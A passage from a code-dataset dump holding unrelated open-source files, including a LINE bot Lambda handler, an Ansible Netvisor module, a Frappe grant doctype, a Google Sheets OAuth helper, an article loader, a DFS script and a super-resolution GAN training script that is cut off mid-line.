logging.getLogger(\"ncu_ai_serverless_line_event\")\nline_logger.addHandler(watchtower.CloudWatchLogHandler())\n\ndef lambda_handler(event, context):\n\n # get X-Line-Signature header value\n signature = event.get(\"headers\").get('X-Line-Signature')\n if signature is None:\n signature = event.get(\"headers\").get('x-line-signature')\n\n # get request body as text\n body = event.get(\"body\")\n line_logger.info(body)\n # handle webhook body\n try:\n print(body)\n handler.handle(body, signature)\n except InvalidSignatureError:\n print(\"Invalid signature. 
Please check your channel access token/channel secret.\")\n\n return {\n \"statusCode\": 200,\n \"body\": json.dumps(\n {\n \"message\": \"hello world\",\n # \"location\": ip.text.replace(\"\\n\", \"\")\n }\n ),\n }\n\n@handler.add(FollowEvent)\ndef handle_line_follow(event):\n return LineBotController.follow_event(event)\n\n@handler.add(UnfollowEvent)\ndef handle_line_unfollow(event):\n return LineBotController.unfollow_event(event)\n\n\n@handler.add(MessageEvent, message=TextMessage)\ndef handle_message(event):\n line_bot_api.reply_message(\n event.reply_token,\n TextSendMessage(text=event.message.text))\n\n@handler.add(MessageEvent, message=ImageMessage)\ndef handle_message(event):\n return LineBotController.image_event(event)\n\n","repo_name":"BingHongLi/ncu-ai-serverless-bot","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21900087334","text":"from __future__ import absolute_import, division, print_function\n__metaclass__ = type\n\nDOCUMENTATION = '''\n---\nmodule: pn_prefix_list_network\nauthor: \"Pluribus Networks (@rajaspachipulusu17)\"\nshort_description: CLI command to add/remove prefix-list-network\ndescription:\n - This module is used to add network associated with prefix list\n and remove networks associated with prefix list.\noptions:\n pn_cliswitch:\n description:\n - Target switch to run the CLI on.\n required: false\n type: str\n state:\n description:\n - State the action to perform. Use C(present) to create\n prefix-list-network and C(absent) to delete prefix-list-network.\n required: true\n type: str\n choices: ['present', 'absent']\n pn_netmask:\n description:\n - netmask of the network associated the prefix list.\n required: false\n type: str\n pn_name:\n description:\n - Prefix List Name.\n required: false\n type: str\n pn_network:\n description:\n - network associated with the prefix list.\n required: false\n type: str\n'''\n\nEXAMPLES = \"\"\"\n- name: Prefix list network add\n community.network.pn_prefix_list_network:\n pn_cliswitch: \"sw01\"\n pn_name: \"foo\"\n pn_network: \"172.16.3.1\"\n pn_netmask: \"24\"\n state: \"present\"\n\n- name: Prefix list network remove\n community.network.pn_prefix_list_network:\n pn_cliswitch: \"sw01\"\n state: \"absent\"\n pn_name: \"foo\"\n pn_network: \"172.16.3.1\"\n pn_netmask: \"24\"\n\"\"\"\n\nRETURN = \"\"\"\ncommand:\n description: the CLI command run on the target node.\n returned: always\n type: str\nstdout:\n description: set of responses from the prefix-list-network command.\n returned: always\n type: list\nstderr:\n description: set of error responses from the prefix-list-network command.\n returned: on error\n type: list\nchanged:\n description: indicates whether the CLI caused changes on the target.\n returned: always\n type: bool\n\"\"\"\n\nfrom ansible.module_utils.basic import AnsibleModule\nfrom ansible_collections.community.network.plugins.module_utils.network.netvisor.pn_nvos import pn_cli, run_cli\nfrom ansible_collections.community.network.plugins.module_utils.network.netvisor.netvisor import run_commands\n\n\ndef check_cli(module, cli):\n \"\"\"\n This method checks for idempotency using prefix-list-network-show command.\n If network exists, return as True else False.\n :param module: The Ansible module to fetch input parameters\n :param cli: The CLI string\n \"\"\"\n name = module.params['pn_name']\n network = module.params['pn_network']\n show = cli\n\n cli += ' 
prefix-list-show format name no-show-headers'\n out = run_commands(module, cli)[1]\n\n if name not in out.split()[-1]:\n module.fail_json(\n failed=True,\n msg='Prefix list with name %s does not exists' % name\n )\n\n cli = show\n cli += ' prefix-list-network-show name %s format network no-show-headers' % name\n rc, out, err = run_commands(module, cli)\n\n if out:\n out = out.split()[-1]\n return True if network in out.split('/')[0] else False\n\n return False\n\n\ndef main():\n \"\"\" This section is for arguments parsing \"\"\"\n\n state_map = dict(\n present='prefix-list-network-add',\n absent='prefix-list-network-remove'\n )\n\n module = AnsibleModule(\n argument_spec=dict(\n pn_cliswitch=dict(required=False, type='str'),\n state=dict(required=True, type='str',\n choices=state_map.keys()),\n pn_netmask=dict(required=False, type='str'),\n pn_name=dict(required=False, type='str'),\n pn_network=dict(required=False, type='str'),\n ),\n required_if=(\n [\"state\", \"present\", [\"pn_name\", \"pn_network\", \"pn_netmask\"]],\n [\"state\", \"absent\", [\"pn_name\", \"pn_network\", \"pn_netmask\"]],\n ),\n required_together=(\n [\"pn_network\", \"pn_netmask\"],\n ),\n )\n\n # Accessing the arguments\n cliswitch = module.params['pn_cliswitch']\n state = module.params['state']\n netmask = module.params['pn_netmask']\n name = module.params['pn_name']\n network = module.params['pn_network']\n\n command = state_map[state]\n\n # Building the CLI command string\n cli = pn_cli(module, cliswitch)\n\n NETWORK_EXISTS = check_cli(module, cli)\n cli += ' %s ' % command\n\n if command == 'prefix-list-network-remove':\n if NETWORK_EXISTS is False:\n module.exit_json(\n skipped=True,\n msg='Prefix list with network %s does not exist' % network\n )\n\n if command == 'prefix-list-network-add':\n if NETWORK_EXISTS is True:\n module.exit_json(\n skipped=True,\n msg='Prefix list with network %s already exists' % network\n )\n\n if name:\n cli += ' name ' + name\n if network:\n cli += ' network ' + network\n if netmask:\n cli += ' netmask ' + netmask\n\n run_cli(module, cli, state_map)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ansible-collections/community.network","sub_path":"plugins/modules/pn_prefix_list_network.py","file_name":"pn_prefix_list_network.py","file_ext":"py","file_size_in_byte":5044,"program_lang":"python","lang":"en","doc_type":"code","stars":108,"dataset":"github-code","pt":"48"} +{"seq_id":"35196461579","text":"import frappe\nfrom frappe import _\nfrom frappe.contacts.address_and_contact import load_address_and_contact\nfrom frappe.utils import get_url\nfrom frappe.website.website_generator import WebsiteGenerator\n\n\nclass GrantApplication(WebsiteGenerator):\n\t_website = frappe._dict(\n\t\tcondition_field = \"published\",\n\t)\n\n\tdef validate(self):\n\t\tif not self.route:\t#pylint: disable=E0203\n\t\t\tself.route = 'grant-application/' + self.scrub(self.name)\n\n\tdef onload(self):\n\t\t\"\"\"Load address and contacts in `__onload`\"\"\"\n\t\tload_address_and_contact(self)\n\n\tdef get_context(self, context):\n\t\tcontext.no_cache = True\n\t\tcontext.show_sidebar = True\n\t\tcontext.parents = [dict(label='View All Grant Applications',\n\t\t\troute='grant-application', title='View Grants')]\n\ndef get_list_context(context):\n\tcontext.allow_guest = True\n\tcontext.no_cache = True\n\tcontext.no_breadcrumbs = True\n\tcontext.show_sidebar = True\n\tcontext.order_by = 'creation desc'\n\tcontext.introduction ='''\n\t\tApply for new Grant Application'''\n\n@frappe.whitelist()\ndef 
send_grant_review_emails(grant_application):\n\tgrant = frappe.get_doc(\"Grant Application\", grant_application)\n\turl = get_url('grant-application/{0}'.format(grant_application))\n\tfrappe.sendmail(\n\t\trecipients= grant.assessment_manager,\n\t\tsender=frappe.session.user,\n\t\tsubject='Grant Application for {0}'.format(grant.applicant_name),\n\t\tmessage='Please Review this grant application: 
' + url,\n\t\treference_doctype=grant.doctype,\n\t\treference_name=grant.name\n\t)\n\n\tgrant.status = 'In Progress'\n\tgrant.email_notification_sent = 1\n\tgrant.save()\n\tfrappe.db.commit()\n\n\tfrappe.msgprint(_(\"Review Invitation Sent\"))\n","repo_name":"frappe/non_profit","sub_path":"non_profit/non_profit/doctype/grant_application/grant_application.py","file_name":"grant_application.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"48"} +{"seq_id":"2927060036","text":"import json\nfrom sys import flags\n\nimport httplib2\n\nimport os\nfrom apiclient import discovery\n# noinspection PyUnresolvedReferences\nfrom apiclient.errors import HttpError\nfrom oauth2client import client\nfrom oauth2client import tools\nfrom oauth2client.file import Storage\n\nimport Options\n\n\ndef get_credentials():\n home_dir = os.path.expanduser('~')\n credential_dir = os.path.join(home_dir, '.credentials')\n if not os.path.exists(credential_dir):\n os.makedirs(credential_dir)\n credential_path = os.path.join(credential_dir,\n 'sheets.googleapis.com-python-quickstart.json')\n\n store = Storage(credential_path)\n credentials = store.get()\n if not credentials or credentials.invalid:\n flow = client.flow_from_clientsecrets(CLIENT_SECRET_FILE, SCOPES)\n flow.user_agent = APPLICATION_NAME\n if flags:\n credentials = tools.run_flow(flow, store, tools.argparser.parse_args([]))\n else: # Needed only for compatibility with Python 2.6\n credentials = tools.run(flow, store)\n print('Storing credentials to ' + credential_path)\n return credentials\n\n\ndef getFileList():\n global FILES\n folder = Options.get_indiv_folder()\n print(folder)\n query = \"'{0}' in parents and mimeType='application/vnd.google-apps.spreadsheet'\".format(folder)\n results = DRIVE_SERVICE.files().list(q=query, fields='files(id, name)', orderBy='name', pageSize=1000).execute()\n FILES = results.get('files', [])\n if not FILES:\n print('No individual files found')\n else:\n print(\"{0} individual files found\".format((len(FILES))))\n\nSCOPES = 'https://www.googleapis.com/auth/drive ' + 'https://www.googleapis.com/auth/spreadsheets'\nCLIENT_SECRET_FILE = './Resources/client_secret.json'\nAPPLICATION_NAME = 'THONvelope Helper API'\n\nFILES = []\n\ncredentials = get_credentials()\nhttp = credentials.authorize(httplib2.Http())\nDRIVE_SERVICE = discovery.build('drive', 'v3', http=http)\ngetFileList()\n\ndiscoveryUrl = ('https://sheets.googleapis.com/$discovery/rest?'\n 'version=v4')\nSHEET_SERVICE = discovery.build('sheets', 'v4', http=http,\n discoveryServiceUrl=discoveryUrl)\n\n","repo_name":"SpringfieldFTK/THONvelopes-Tool","sub_path":"Requests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26039959678","text":"\"\"\"Define different types of media.\n\nCurrently, the only media defined is \"movie.\" However,\nmedia could also include, for example, music or books.\n\"\"\"\n\nclass Movie():\n \"\"\"A representation of a movie.\n\n The object is a container for information related to a specific movie.\n \"\"\" \n def __init__(self, movie_title, movie_storyline, poster_image,\n trailer_youtube, IMDB_url):\n \"\"\"Initialize a Movie object.\n\n Keyword arguments:\n movie_title -- the title of the movie\n movie_storyline -- a short description of the movie's plot\n poster_image -- a url to a poster image of the movie\n 
trailer_youtube -- a url to a YouTube trailer for the movie\n IMDB_url -- a url to the IMDB entry for the movie\n \"\"\"\n self.title = movie_title\n self.storyline = movie_storyline\n self.poster_image_url = poster_image\n self.trailer_youtube_url = trailer_youtube\n self.IMDB_url = IMDB_url\n","repo_name":"ryanwc/MoviesWebsite","sub_path":"media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72487732306","text":"import os\nfrom collections import defaultdict\nfrom typing import Sequence\n\nimport pandas as pd\nimport regex as re\n\nfrom models.article import Article\nfrom tools.src.annotations import Annotations\nfrom tools.src.annotation import Annotation\n\n\nclass ArticlesLoader:\n \"\"\" A simple class that loads the article files in a provided directory as\n articles.\n\n The articles are provided by the workshop organizers in separate files in a\n directory. Each article consists of title and content sentences written\n separately on new lines (each). The name of the file contains the id of the\n article.\n\n \"\"\"\n\n def __init__(self, data_dir,\n article_file_id_pattern,\n article_label_pattern_slc, article_label_pattern_flc,\n labels_dir_slc=None, labels_dir_flc=None):\n\n self.data_dir = data_dir\n self.labels_dir_slc = labels_dir_slc\n self.labels_dir_flc = labels_dir_flc\n self.article_file_id_pattern = article_file_id_pattern\n self.article_label_pattern_slc = article_label_pattern_slc\n self.article_label_pattern_flc = article_label_pattern_flc\n\n def load_data(self) -> Sequence[Article]:\n \"\"\" Loads all the articles from the files in the provided directory.\n\n Returns a list of Article objects\n \"\"\"\n article_files = os.listdir(self.data_dir)\n articles = [self.__map_to_article(os.path.join(self.data_dir, article))\n for article in article_files]\n\n load_slc_labels: bool = self.labels_dir_slc is not None\n load_flc_labels: bool = self.labels_dir_flc is not None\n\n if load_slc_labels:\n for article in articles:\n self.__load_slc_labels(article)\n\n if load_flc_labels:\n for article in articles:\n self.__load_flc_labels(article)\n\n print(\"{} articles loaded\".format(len(articles)))\n return articles\n\n def __map_to_article(self, file_path) -> Article:\n \"\"\"Helper method that constructs an Article object from an article\n file\"\"\"\n with open(file_path) as file:\n article_id = re \\\n .search(self.article_file_id_pattern, file.name, 0) \\\n .group(1)\n content = file.readlines()\n return Article(article_id, content)\n\n def __load_slc_labels(self, article: Article):\n file_name = os.path.join(self.labels_dir_slc,\n self.article_label_pattern_slc\n .format(article.article_id))\n\n with open(file_name, mode=\"r\") as file:\n slc_labels = pd.read_csv(file, sep=\"\\t\", names=[\"article_id\",\n \"sentence_id\",\n \"technique\"])\n article.slc_labels = slc_labels.technique.values\n\n def __load_flc_labels(self, article: Article):\n article_id = article.article_id\n # print(\"Loading flc annotations for {}\".format(article_id))\n\n file_name = os.path.join(self.labels_dir_flc,\n self.article_label_pattern_flc\n .format(article_id))\n\n article_annotations = Annotations()\n article_annotations.load_annotation_list_from_file(file_name)\n\n if article_annotations.has_article(article_id):\n annotations = article_annotations.get_article_annotations(article_id)\n spans = annotations.get_article_annotations()\n else:\n spans = []\n\n # 
convert the article annotations to sentence annotations\n sentence_annotations = self.__convert_annotations(article, spans)\n article.set_flc_annotations(sentence_annotations)\n\n @staticmethod\n def __convert_annotations(article, spans):\n \"\"\"\n Converts an article-based annotation to an annotation inside a sentence\n :param article:\n :param spans: list of article-wide spans. E.g. each span start and end\n position is based on the article length, across sentences.\n :return: list of spans covering the sentences of the article. Each entry\n in the list is a bound inside a sentence.\n \"\"\"\n article_text = \"\".join(article.article_sentences)\n article_annotations = []\n\n for i, sent in enumerate(article.article_sentences):\n sent_start = article_text.find(sent)\n assert sent_start != -1\n\n sentence_annotations = []\n sent_end = sent_start + len(sent)\n for span in spans:\n span_start = span.get_start_offset()\n span_end = span.get_end_offset()\n\n span_starts_in_sentence = sent_start <= span_start < sent_end\n span_ends_in_sentence = span_start < sent_start < span_end <= sent_end\n\n if span_starts_in_sentence:\n sentence_annotation_start = span_start - sent_start\n sentence_annotation_end = min(sent_end, span_end) - sent_start\n sentence_annotation = Annotation(span.get_label(),\n sentence_annotation_start,\n sentence_annotation_end)\n sentence_annotations.append(sentence_annotation)\n assert sentence_annotation_start <= sentence_annotation_end\n elif span_ends_in_sentence:\n sentence_annotation_start = 0\n sentence_annotation_end = min(sent_end, span_end) - sent_start\n sentence_annotation = Annotation(span.get_label(),\n sentence_annotation_start,\n sentence_annotation_end)\n sentence_annotations.append(sentence_annotation)\n assert sentence_annotation_start <= sentence_annotation_end\n\n article_annotations.append(sentence_annotations)\n\n return article_annotations\n","repo_name":"freespirit/propaganda-NLP4IF-2019","sub_path":"models/articles_loader.py","file_name":"articles_loader.py","file_ext":"py","file_size_in_byte":6111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2529870924","text":"\r\nfrom asyncio import current_task\r\n\r\n\r\ng1 = {'S' :['D','E','P'],\r\n'A': ['B', 'C'],\r\n'C': ['A', 'D', 'F'],\r\n'D': ['B', 'C', 'E', 'S'], \r\n'B': ['A', 'D'], \r\n'G': ['F'], \r\n'E': ['D', 'H', 'R', 'S'], \r\n'F': ['C', 'G', 'R'], \r\n'H': ['E', 'P', 'Q'], \r\n'P': ['H', 'Q', 'S'],\r\n'Q': ['H', 'P'], \r\n'R': ['E', 'F']\r\n}\r\nvisited ={'A':0,'B':0,'C':0,'D':0,'E':0,'F':0,'G':0,'H':0,'P':0,'Q':0,'R':0,'S':0}\r\nans=[]\r\nstack_dfs =[]\r\nstack_dfs.append(list(g1.keys())[0])# Let get first element for our graph 1\r\ntemp_str =\"\"\r\ncurrent_stack=\"\"\r\nwhile stack_dfs and temp_str!='G':# we make sure our stack is not empty and not 'G' our target find Goal \r\n print(stack_dfs)\r\n current_stack=stack_dfs.pop()\r\n temp_str=current_stack[-1]#Let pop element from top of the stack\r\n if(visited[temp_str]==0):# make that element is not visited yet\r\n ans.append(temp_str)# add it to our node we visited\r\n visited[temp_str]=1# change it 1 to mark visited\r\n # if(temp_str=='G'):\r\n # break\r\n for x in reversed(g1[temp_str]):# Let access adjacent node from back of the list meaning from farthest right (Deepest ) \r\n # if x not in stack_dfs:\r\n new_stack = list(current_stack)\r\n new_stack.append(x)\r\n stack_dfs.append(new_stack) # let push that Node at bottom of our stack, So we can pop the Left most node first 
\r\n \r\n# print(ans)\r\n# For Printing Purpose \r\nans_str =\"DFS stacks: \"\r\nfor x in ans:\r\n ans_str=ans_str+x+\" \"\r\nprint(ans_str)\r\nans_str=\"DFS PATH: \"\r\nfor x in current_stack:\r\n ans_str=ans_str+x+\" \"\r\nprint(ans_str) ","repo_name":"Srujan560/ICSI-535","sub_path":"DFS_Undirected graph_unweighted_stack.py","file_name":"DFS_Undirected graph_unweighted_stack.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32113901732","text":"import simple_matrix_pb2\nimport struct\ns = simple_matrix_pb2.SimpleMatrix()\ns.id = \"name\"\ns.device_id = \"device_id\"\ns.num_cols = 2\ns.data_type=5\ns.payload.append(struct.pack('dd',1.0,3.14159))\nf = open('simplematrix.bin','w')\nf.write(s.SerializeToString())\nf.close()\n","repo_name":"hello/kuria","sub_path":"haltija/unit-test/test-data/make_simple_matrix.py","file_name":"make_simple_matrix.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4436365304","text":"import os, argparse, sys, shutil, warnings, glob\nfrom datetime import datetime\nimport matplotlib.pyplot as plt\nfrom math import log2, log10\nimport pandas as pd\nimport numpy as np\nfrom collections import OrderedDict\n\nfrom torchvision import transforms, utils\nimport torchvision\nimport torch.nn.functional as F\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch\nfrom torch.utils.data import DataLoader\nfrom torch.autograd import Variable\nimport torch.optim.lr_scheduler as lr_scheduler\n\nfrom skimage import exposure, color, io, img_as_float, img_as_ubyte\nfrom skimage.util import view_as_windows, pad, montage\nfrom PIL import Image, ImageFilter\nimport imagej\n\nimport data_loader as data\nimport models\n\nimport pytorch_fid.fid_score as fid_score\n\n\ndef new_compress_curriculum(args, cur_factor, csv='train', stc=False):\n transformed_dataset = data.Compress_Dataset(csv_file=data.compress_csv_path(csv, args.dataset),\n transform=data.Compose([\n transforms.RandomCrop((args.patch_size, args.patch_size)),\n transforms.RandomHorizontalFlip(),\n transforms.RandomVerticalFlip(),\n data.Rescale((args.patch_size, args.patch_size), up_factor=cur_factor, stc=stc), \n data.ToTensor()\n ]))\n dataloader = DataLoader(transformed_dataset, batch_size=args.batch_size, shuffle=True, num_workers=args.num_workers)\n return dataloader\n\ndef train(args, epoch, run, dataloader, generator, discriminator, optimizer_G, optimizer_D, criterionL, criterionMSE, Tensor=None, device='cuda:0', patch=None):\n l = args.percep_weight\n if args.gan == 0:\n gan = False\n else:\n gan = True\n epoch_loss = 0\n gan_loss = 0\n total_loss = 0\n dis_loss = 0\n generator.train()\n for iteration, batch in enumerate(dataloader):\n real_mid = Variable(batch['input'].type(Tensor).to(device), requires_grad=False)\n real_high = Variable(batch['output'].type(Tensor).to(device), requires_grad=False) \n # Adversarial ground truths\n valid = Variable(Tensor(np.ones((real_mid.size(0), *patch))).to(device), requires_grad=False)\n fake = Variable(Tensor(np.zeros((real_mid.size(0), *patch))).to(device), requires_grad=False) \n #---------------\n # Train Generator\n #--------------- \n optimizer_G.zero_grad() \n # GAN loss\n fake_high = generator(real_mid)\n if gan:\n pred_fake = discriminator(fake_high, real_mid)\n loss_GAN = criterionMSE(pred_fake, valid)\n \n # Identity\n lossL1 = criterionL(fake_high, 
real_high) \n loss_pixel = lossL1 \n # Total loss\n if gan:\n loss_G = l * loss_GAN + (1-l) * loss_pixel \n loss_G.backward()\n total_loss = total_loss + loss_G.item()\n gan_loss = gan_loss + loss_GAN.item()\n else:\n loss_pixel.backward()\n optimizer_G.step() \n #---------------\n # Train Discriminator\n #--------------- \n if gan and iteration % args.num_critic == 0:\n optimizer_D.zero_grad() \n # Real loss\n pred_real = discriminator(real_high, real_mid)\n loss_real = criterionMSE(pred_real, valid) \n # Fake loss\n pred_fake = discriminator(fake_high.detach(), real_mid)\n loss_fake = criterionMSE(pred_fake, fake)\n # Total loss\n loss_D = 0.5 * (loss_real + loss_fake)\n loss_D.backward()\n optimizer_D.step()\n dis_loss = dis_loss + loss_D.item() \n epoch_loss = epoch_loss + loss_pixel.item() \n if gan:\n sys.stdout.write('\\r[%d/%d][%d/%d] Discriminator_Loss: %.4f Generator_Loss (Identity/Advers/Total): %.4f/%.4f/%.4f' \n % (epoch, args.num_epochs, iteration, len(dataloader), loss_D.item(), \n loss_pixel.item(), loss_GAN.item(), loss_G.item()))\n else:\n sys.stdout.write('\\r[%d/%d][%d/%d] Generator_L1_Loss: %.4f' \n % (epoch, args.num_epochs, iteration, len(dataloader), loss_pixel.item()))\n print(\"\\n ===> Epoch {} Complete: Avg. Loss: {:.4f}\".format(epoch, epoch_loss / len(dataloader))) \n g_path = os.path.join('weights', run, 'generator.pth')\n d_path = os.path.join('weights', run, 'discriminator.pth')\n os.makedirs(os.path.join('weights', run), exist_ok=True)\n torch.save(generator.state_dict(), g_path)\n if gan:\n os.makedirs(os.path.join('weights', run), exist_ok=True)\n torch.save(discriminator.state_dict(), d_path)\n\ndef test(args, generator, test_csv, stitching=False):\n try:\n shutil.rmtree('output')\n except:\n pass\n os.makedirs('output', exist_ok=True)\n os.makedirs('output/lr', exist_ok=True)\n os.makedirs('output/hr', exist_ok=True)\n os.makedirs('output/sr', exist_ok=True)\n os.makedirs('output/temp_patch', exist_ok=True)\n os.makedirs('output/temp_patch_target', exist_ok=True)\n os.makedirs('output/temp_channel', exist_ok=True)\n step = 192\n test_files = pd.read_csv(test_csv)\n avg_fid = 0\n avg_psnr = 0\n for k in range(len(test_files)):\n img = Image.open(test_files.iloc[k, 0])\n img_hr_array = img_as_float(np.array(img))\n img_lr = img.resize((int(img.size[1]/args.up_scale), int(img.size[0]/args.up_scale)))\n img_lr = img_lr.resize(img.size, Image.BILINEAR)\n img_lr = img_lr.filter(ImageFilter.GaussianBlur(radius=((args.up_scale-1)/2)))\n img_lr_array = img_as_float(np.array(img_lr))\n pad_h = int((np.floor(img_lr_array.shape[0]/step) * step + args.patch_size) - img_lr_array.shape[0])\n pad_w = int((np.floor(img_lr_array.shape[1]/step) * step + args.patch_size) - img_lr_array.shape[1])\n img_lr_array_padded = pad(img_lr_array, ((0, pad_h), (0, pad_w), (0, 0)), mode='reflect')\n img_lr_wd = view_as_windows(img_lr_array_padded, (args.patch_size, args.patch_size, 3), step=step)\n img_lr_wd = np.squeeze(img_lr_wd)\n img_hr_array_padded = pad(img_hr_array, ((0, pad_h), (0, pad_w), (0, 0)), mode='reflect')\n img_hr_wd = view_as_windows(img_hr_array_padded, (args.patch_size, args.patch_size, 3), step=step)\n img_hr_wd = np.squeeze(img_hr_wd) \n with open('output/temp_patch/TileConfiguration.txt', 'w') as text_file:\n print('dim = {}'.format(2), file=text_file)\n with torch.no_grad():\n generator.eval()\n for i in range (0, img_lr_wd.shape[1]):\n for j in range (0, img_lr_wd.shape[0]):\n target = img_hr_wd[j, i]\n patch = img_lr_wd[j, i].transpose((2, 0, 1))[None, :]\n 
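# editor's note: the next few lines run inference patch-by-patch; torch.from_numpy(...).cuda() assumes a CUDA device is available, consistent with the hard-coded 'cuda:0' used elsewhere in this script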
patch_tensor = torch.from_numpy(patch).float().cuda()\n prediction = generator(patch_tensor)\n io.imsave('output/temp_patch/{}_{}.tiff'.format(j, i), img_as_ubyte(np.clip(prediction.cpu().numpy()[0], 0, 1)))\n io.imsave('output/temp_patch_target/{}_{}.tiff'.format(j, i), img_as_ubyte(target))\n print('{}_{}.tiff; ; ({}, {})'.format(j, i, i*step, j*step), file=text_file)\n fid = fid_score.calculate_fid_given_paths(('output/temp_patch', 'output/temp_patch_target'), 8, 'cuda:0', 2048)\n avg_fid = avg_fid + fid\n if stitching:\n sys.stdout.write('\\r{}/{} stitching, please wait...'.format(k+1, len(test_files))) \n params = {'type': 'Positions from file', 'order': 'Defined by TileConfiguration', \n 'directory':'output/temp_patch', 'layout_file': 'TileConfiguration.txt', \n 'fusion_method': 'Linear Blending', 'regression_threshold': '0.30', \n 'max/avg_displacement_threshold':'2.50', 'absolute_displacement_threshold': '3.50', \n 'compute_overlap':False, 'computation_parameters': 'Save computation time (but use more RAM)', \n 'image_output': 'Write to disk', 'output_directory': 'output/temp_channel'}\n plugin = \"Grid/Collection stitching\"\n ij.py.run_plugin(plugin, params)\n list_channels = [f for f in os.listdir('output/temp_channel')]\n c1 = io.imread(os.path.join('output/temp_channel', list_channels[0]))\n c2 = io.imread(os.path.join('output/temp_channel', list_channels[1]))\n c3 = io.imread(os.path.join('output/temp_channel', list_channels[2]))\n c1 = c1[:img.size[1], :img.size[0]]\n c2 = c2[:img.size[1], :img.size[0]]\n c3 = c3[:img.size[1], :img.size[0]]\n img_to_save = np.clip(np.stack((c1, c2, c3)).transpose((1, 2, 0)), 0, 1)\n io.imsave(os.path.join('output/sr', os.path.basename(test_files.iloc[k, 0]).replace('.jpg', '.tiff')), img_as_ubyte(img_to_save))\n io.imsave(os.path.join('output/lr', os.path.basename(test_files.iloc[k, 0]).replace('.jpg', '.tiff')), img_as_ubyte(img_lr_array))\n io.imsave(os.path.join('output/hr', os.path.basename(test_files.iloc[k, 0]).replace('.jpg', '.tiff')), img_as_ubyte(img))\n else:\n psnr = p_snr('output/temp_patch', 'output/temp_patch_target')\n avg_psnr = avg_psnr + psnr\n if stitching:\n psnr = p_snr('output/sr', 'output/hr')\n else:\n psnr = avg_psnr / len(test_files)\n fid = avg_fid / len(test_files)\n return fid, psnr\n\ndef p_snr(path_input, path_ref):\n MSE = nn.MSELoss()\n imgs_input = glob.glob(os.path.join(path_input, '*.tiff'))\n imgs_ref = glob.glob(os.path.join(path_ref, '*.tiff'))\n ave_psnr = 0\n for i in range(len(imgs_input)):\n img_input = torch.from_numpy(img_as_float(io.imread(imgs_input[i]).transpose(2, 1, 0))) \n img_ref = torch.from_numpy(img_as_float(io.imread(imgs_ref[i]).transpose(2, 1, 0)))\n img_input = img_input[None, :]\n img_ref = img_ref[None, :] \n mse = MSE(img_input, img_ref) \n psnr = 10 * log10(1 / mse.item())\n ave_psnr += psnr\n ave_psnr = ave_psnr / len(imgs_input)\n return ave_psnr\n\ndef print_output(generator, dataloader_valid, device='cuda:0'):\n os.makedirs('output/print', exist_ok=True)\n os.makedirs('output/print/lr', exist_ok=True)\n os.makedirs('output/print/hr', exist_ok=True)\n os.makedirs('output/print/sr', exist_ok=True)\n with torch.no_grad(): \n generator.eval()\n print(\"===> 8x: printing sampled patches\")\n for iteration, batch in enumerate(dataloader_valid): \n input, target = batch['input'].to(device), batch['output'].to(device)\n imgs_input =input.float().to(device)\n prediction = generator(imgs_input)\n target = target.float()\n for i in range(target.shape[0]):\n 
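# editor's note: the save_image calls below write matched LR/HR/SR sample patches to output/print/{lr,hr,sr} so generator quality can be inspected visually between epochs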
utils.save_image(imgs_input[i], 'output/print/lr/{}.tiff'.format(i))\n utils.save_image(target[i], 'output/print/hr/{}.tiff'.format(i))\n utils.save_image(prediction[i], 'output/print/sr/{}.tiff'.format(i))\n break \n\ndef main():\n parser = argparse.ArgumentParser(description='Train WSISR on compressed TMA dataset')\n parser.add_argument('--batch-size', default=32, type=int, help='Batch size')\n parser.add_argument('--patch-size', default=224, type=int, help='Patch size')\n parser.add_argument('--up-scale', default=5, type=float, help='Targeted upscale factor')\n parser.add_argument('--num-workers', default=4, type=int, help='Number of workers')\n parser.add_argument('--num-epochs', default=900, type=int, help='Number of epochs, more epochs are desired for GAN training')\n parser.add_argument('--g-lr', default=0.0001, type=float, help='Learning rate of the generator')\n parser.add_argument('--d-lr', default=0.00001, type=float, help='Learning rate of the descriminator')\n parser.add_argument('--percep-weight', default=0.01, type=float, help='GAN loss weight')\n parser.add_argument('--run-from', default=None, type=str, help='Load weights from a previous run, use folder name in [weights] folder')\n parser.add_argument('--start-epoch', default=1, type=int, help='Starting epoch for the curriculum, start at 1/2 of the epochs to skip the curriculum')\n parser.add_argument('--gan', default=1, type=int, help='Use GAN')\n parser.add_argument('--num-critic', default=1, type=int, help='Iteration interval for training the descriminator') \n parser.add_argument('--test-interval', default=50, type=int, help='Epoch interval for FID score testing')\n parser.add_argument('--print-interval', default=10, type=int, help='Epoch interval for output printing') \n parser.add_argument('--dataset', default='TMA', type=str, help='Dataset folder name')\n args = parser.parse_args()\n warnings.filterwarnings('ignore')\n device = torch.device('cuda:0')\n tensor = torch.cuda.FloatTensor\n data.generate_compress_csv()\n valid_dataset = new_compress_curriculum(args, args.up_scale, 'valid')\n generator = models.Generator()\n generator.to(device);\n discriminator = models.Discriminator()\n discriminator.to(device);\n criterionL = nn.L1Loss().cuda()\n criterionMSE = nn.MSELoss().cuda()\n optimizer_G = torch.optim.Adam(generator.parameters(), lr=args.g_lr)\n optimizer_D = torch.optim.Adam(discriminator.parameters(), lr=args.d_lr)\n patch = (1, args.patch_size // 2 ** 4, args.patch_size // 2 ** 4)\n if args.run_from is not None:\n generator.load_state_dict(torch.load(os.path.join('weights', args.run_from, 'generator.pth')))\n try:\n discriminator.load_state_dict(torch.load(os.path.join('weights', args.run_from, 'discriminator.pth')))\n except:\n print('Discriminator weights not found!')\n pass\n optimizer_G = torch.optim.Adam(generator.parameters(), lr=args.g_lr)\n optimizer_D = 